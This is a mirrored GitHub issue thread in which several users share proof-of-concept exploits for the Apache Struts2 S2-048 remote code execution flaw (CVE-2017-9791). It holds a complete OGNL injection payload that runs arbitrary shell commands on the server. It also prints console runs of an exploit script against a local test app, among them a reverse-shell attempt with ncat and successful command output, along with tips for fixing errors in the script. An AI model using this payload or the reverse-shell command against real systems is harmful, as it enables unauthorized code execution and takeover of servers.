Code Monkey home page Code Monkey logo

Comments (5)

nixawk avatar nixawk commented on July 30, 2024

Poc Code - https://github.com/nixawk/labs/blob/master/CVE-2017-9791/exploit_S2-048.py

from labs.

nixawk avatar nixawk commented on July 30, 2024

Another Poc Here:

%{(#_='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='id').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}

If you use the following payload, an error may be here:

root@sh:~/S2-048# python s2.py http://127.0.0.1:8080/2.3.15.1-showcase/integration/saveGangster.action "ls -l"
[*] exploit Apache Struts2 S2-048
[+] command: ls -l
Traceback (most recent call last):
  File "s2.py", line 71, in <module>
    exploit(url, cmd)
  File "s2.py", line 52, in exploit
    resp = requests.post(url, data=data, headers=headers)
  File "/usr/local/lib/python2.7/dist-packages/requests/api.py", line 110, in post
    return request('post', url, data=data, json=json, **kwargs)
  File "/usr/local/lib/python2.7/dist-packages/requests/api.py", line 56, in request
    return session.request(method=method, url=url, **kwargs)
  File "/usr/local/lib/python2.7/dist-packages/requests/sessions.py", line 488, in request
    resp = self.send(prep, **send_kwargs)
  File "/usr/local/lib/python2.7/dist-packages/requests/sessions.py", line 641, in send
    r.content
  File "/usr/local/lib/python2.7/dist-packages/requests/models.py", line 797, in content
    self._content = bytes().join(self.iter_content(CONTENT_CHUNK_SIZE)) or bytes()
  File "/usr/local/lib/python2.7/dist-packages/requests/models.py", line 722, in generate
    raise ChunkedEncodingError(e)
requests.exceptions.ChunkedEncodingError: ('Connection broken: IncompleteRead(0 bytes read)', IncompleteRead(0 bytes read))

Poc is updated. urllib2 can handle the exception.

root@sh:~/S2-048# python exploit_S2-048.py http://127.0.0.1:8080/2.3.15.1-showcase/integration/saveGangster.action "ncat -e /bin/bash 127.0.0.1 4444"
[*] name  : exploit Apache Struts2 S2-048
[+] status: http://127.0.0.1:8080/2.3.15.1-showcase/integration/saveGangster.action - vulnerable to Apache Struts2 S2-048
[+] execmd: ncat -e /bin/bash 127.0.0.1 4444
Ncat: Connection refused.

root@sh:~/S2-048# python exploit_S2-048.py http://127.0.0.1:8080/2.3.15.1-showcase/integration/saveGangster.action "uname -a"
[*] name  : exploit Apache Struts2 S2-048
[+] status: http://127.0.0.1:8080/2.3.15.1-showcase/integration/saveGangster.action - vulnerable to Apache Struts2 S2-048
[+] execmd: uname -a
Linux sh 4.6.0-kali1-686-pae #1 SMP Debian 4.6.4-1kali1 (2016-07-21) i686 GNU/Linux

References

  1. https://stackoverflow.com/questions/14442222/how-to-handle-incompleteread-in-python

from labs.

dragoneeg avatar dragoneeg commented on July 30, 2024

my test Poc : https://github.com/dragoneeg/Struts2-048

from labs.

sasqwatch avatar sasqwatch commented on July 30, 2024

This is another shorter payload - http://pentestit.com/apache-struts2-showcase-remote-code-execution-s2-048/

from labs.

nixawk avatar nixawk commented on July 30, 2024

If your poc makes an error based on requests, ex:

requests.exceptions.ChunkedEncodingError: ('Connection broken: IncompleteRead(0 bytes read)', IncompleteRead(0 bytes read))

Please try to add the following code:

import httplib

httplib.HTTPConnection._http_vsn = 10
httplib.HTTPConnection._http_vsn_str = 'HTTP/1.0'

References

  1. https://github.com/nixawk/labs/blob/master/CVE-2017-5638/exploit-requests.py

from labs.

Related Issues (20)

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.